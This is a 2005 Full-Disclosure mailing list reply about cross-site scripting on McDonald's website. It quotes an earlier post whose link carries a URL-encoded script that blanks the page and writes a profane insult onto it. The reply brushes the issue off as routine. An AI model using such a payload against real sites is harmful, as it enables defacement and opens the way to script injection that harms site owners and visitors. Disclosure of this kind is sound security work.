[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Micky-dee's anyone?
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Micky-dee's anyone?
- From: Paul Kurczaba <seclists@xxxxxxxxxxxxxx>
- Date: Sun, 01 May 2005 11:35:50 -0400
Just another case of cross site scripting. I would understand people
caring if it was a bank's site...but McDonalds?
tuytumadre@xxxxxxx wrote:
To all you people that like McDonalds, here is a quick link that may
show you the light:
http://www.mcdonalds.com/app_controller.bumper.bumper.html?_continue=%29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63%65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E%74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%79%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29%3B%3C%2
F%73%63%72%69%70%74%3E
<http://www.mcdonalds.com/app_controller.bumper.bumper.html?_continue=%29%22%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%2E%73%74%79%6C%65%2E%62%61%63%6B%67%72%6F%75%6E%64%3D%22%77%68%69%74%65%22%3B%73%65%74%54%69%6D%65%6F%75%74%28%22%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%62%3E%3C%63%65%6E%74%65%72%3E%3C%62%72%3E%3C%62%72%3E%44%6F%6E%74%20%65%61%74%20%4D%63%44%6F%6E%61%6C%64%73%20%79%6F%75%20%66%61%74%20%66%75%63%6B%21%27%29%22%29%3B%3C%2F%73%63%72%69%70%74%3E>
Interesting, huh?
Regards,
Pauil
------------------------------------------------------------------------
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/